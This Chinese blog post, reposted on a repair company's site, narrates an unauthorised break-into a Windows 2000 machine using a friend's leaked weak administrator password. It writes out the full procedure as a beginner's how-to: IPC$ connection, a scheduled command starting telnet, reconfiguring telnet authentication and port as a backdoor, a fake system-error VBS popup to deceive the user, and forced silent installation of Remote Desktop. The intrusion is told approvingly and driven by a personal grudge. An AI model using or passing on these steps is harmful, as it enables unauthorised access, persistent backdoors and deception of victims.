空手入白刃
黑基原创,转载请注明出处!
媒介:
本来不是想写这篇文章的,只是因为给我QQ上某位仁兄的安慰,决议写一次一个只利用windows本身所自带的软件来进行一次入侵。同时也给和我一样的新手们,看看如何在费力的情况下,尽本身的气力,拿到最高的权限
在说怎样入侵之前,先让各人对我怎样会有这个动机来了解一下,以是先让各人看一段谈天记载:
2004年1月某日,我去附近的网吧彻夜,话说在听着一位做nj的朋侪所掌管的栏目,忽然,QQ“嘀嘀”地想起来,一看,原来是我的一位旧朋侪,也喜好网络安全,谈天记载如下(某些片段鉴于放出去,会影响自己的抽象,已删.呵呵~ )
无耻之徒(如许称谓相信他不介怀吧,以下简称(无)):YtT GG,在不在,有事求!!
我:我不在,不过有事可以留言!
无:YtT GG,我对你的敬慕有如黄河之水滚滚不绝,有如长江之水,一发不可收拾…(省略若干马屁),是如许滴,我扫到了一个弱口令,有admin权限的哦,帮我hack了他!
我:没这个时间啊,忙忙忙~~~
无:求求你拉!
我:我真的没有时间啊,何况你也应该会啊。
无:我如今在网吧,”瘟”98啊
我:哈哈,我如今也是在网吧啊,不过是2000,爽啊/这个就是典范的祸发齿牙!
无:那就帮帮我吧,我裸体跪在雪窖冰天里,如许子来求你啦!
我:就算你裸体,头向下,前后翻滚来求我,都不可!
无:算了,我还打算你帮我的话,来日诰日请你M记,
我:che~又不是没吃过。
无:但是我QQ上有位和我们住在很近的一个的PPMM,她说很仰慕你滴才气,我还打算来日诰日在M记那边介绍你给她了解….
我:.........,老大你怎样说这种话呢!!一世人,2兄弟,想要我帮助就作声,就算要我上刀山,下油海,我都在所不辞,区区大事,立刻帮你搞定! IP拿来!顺便问一下,谁人MM真的很PP吗?
无:是滴,ip:61.xx.xx.x,user:administrator,pwd:123
……
看了上面的谈天记载,明白我为什么会做这种事了吧,牢骚话就不说了,如今开端入侵。Let’s go~
由于在网吧,当然有网吧办理软件了,顺遂地把网吧办理软件地进程终止了,如今进行“黑客行“,呵呵~
相信各人都明白ipc$怎样入侵了吧,我们就不多空话了,从开端那边输出cmd,顺次输出:
net use \\ip\ipc$ “123” /user:”administrator” //建立具有admin权限的ipc$连接
net time \\ip //检察长途主机的时间
at \\ip time net start telnet //让长途主机在指定的时间运转我的下令,我的下令就是启动telnet服务,
我设定的时间是3分钟,我们有三分钟的休息时间,听着做NJ朋侪点给我Twins《朋侪的爱》,再一次沉迷在回忆中… …(发起各人去听听,呵呵~)
歌声嘎然而止,思路回到了显示,时间到了,telnet ip 简直是打开了23端口,对了,要解决ntlm这个拦路虎,不过这是小题目,太容易解决了。先在cmd下输出:net user administrator 123,下令乐成,然后为cmd创建了快捷方法,然后用右键单击这个快捷方法,在属性那边选择,选择 以其他的用户身份运转 ,使用以及确定。再次运转快捷方法的cmd,会弹出一个窗口,叫你选择用谁的身份运转,我们只需在用户名那边输出Administrator,暗码输出123,域谁人选项就不用理它了,运转cmd后,可以连接该长途主机了,直接就telnet ip,这时要是连接乐成的话,会提示你选择y&n,当然是y啦,要是你的输出没有错的话,我们如今就拿到了一个具有admin权限的shell了,先net user一下,看看有那些用户,
哈哈,不多,也就是有4个用户。
administrator,guest,chirs.TsInternetUser这几个用户,眼尖的朋侪大概看到有TsInternetUser这个用户,不由得高兴起来,我也是,呵呵,因为这个用户是windows Terminal Services公用的,但是我用net start下令来看了一下, 却没有Terminal Services这这服务,哦!我想起来了,win2000有些版本一般一安装终了,就会有TsInternetUser这个用户名,例如win2k初级服务器版本,我们等一下就给它开3389玩玩,嘿嘿,不过目前先给telnet这个好后门做点手脚,方便我们以后的造访,输出tlntadmn.呈现一下选项:
Microsoft (R) Windows 2000 (TM) (内部版本号 2195)
Telnet Server Admin (Build 5.00.99201.1)
请在下列选项中选择一个:
0) 退出这个使用程序
1) 列出当前用户
2) 结束一个用户的会话 ...
3) 显示 / 变动注册表设置 ...
4) 开端服务
5) 停止服务
请键入一个选项的号码 [0 - 5] 以选择该选项:
当然是选择3啦,然后又呈现一下的界面
请在下列选项中选择一个:
0) 退出这个菜单
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) DefaultShell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
7和8都是我们要做手脚的地方,先选择7,解决ntlm的验证,要是我的影象没有错的话,ntlm的验证有3中方法,0,是接纳用户名加暗码的认证制度,1是先接纳ntlm认证,不可的话再改用户名加暗码的验证方法,2就是只接纳ntlm验证,看了看,默认设置是2,呵呵,我们把ntlm确当前值修改成0,确认,退出到前一个菜单,我们选择第8,telnetport,确认你选择,这时会显示当前的端口时23,而且扣问是否变动这个值,当然是Yes啦,输出了你本身想用的端口就可以了,但是记着不要和正常的端口辩论就可以了。退出tlntadmn,我们要做什么了呢?恩,对就是期待好久的开启对方的3389啦,不过我们要是贸贸然重启对方的电脑,我想除非呆子才不晓得本身的电脑给人入侵了。以是我们要想一个好方法。最简单的就是写一个vbs脚本,在cmd下顺次输出:
echo set wshell=wscript.createobject("wscript.shell") >c:\aa.vbs
echo msgbox "vbs脚本编译器产生紧张错误,windows行将自动重新启动修复,请生存当前全部事情!">>c:\aa.vbs
如许,对方就会自动等我们自动关机了。,不用管对方有没有看到,横竖我们可以关照了他(她)要关机了,呵呵,我们如今就开端安装3389le ,顺次在dos下输出:
echo [Components] > c:\aa
echo TSEnable = on >> c:\aa
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\aa /q/r
如许,对方就会强制重启了,等对方安装好了3389后,你用3389登岸的时间,只需记着C盘的aa.vbs和aa文件啊。
不过我登岸上去,在安装QQ的目录那边看到了谁人人的QQ号码,才晓得他居然就是我的初中同学,呵呵,看来我成为了或人和或人的争风喝醋这种“愤恨“斗争的棋子了。既然云云,就火上加油吧,横竖那家伙也在线。以后的事就不用我说了。什么,谁人PPMM?
唉,不要说了,我给人骗了,M记是去了,但是是我本身掏钱包,MM也看了,不过,从我看了她以后,一连发了几个早晨的恶梦,智慧如你们的,相信谁人MM有多PP了。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
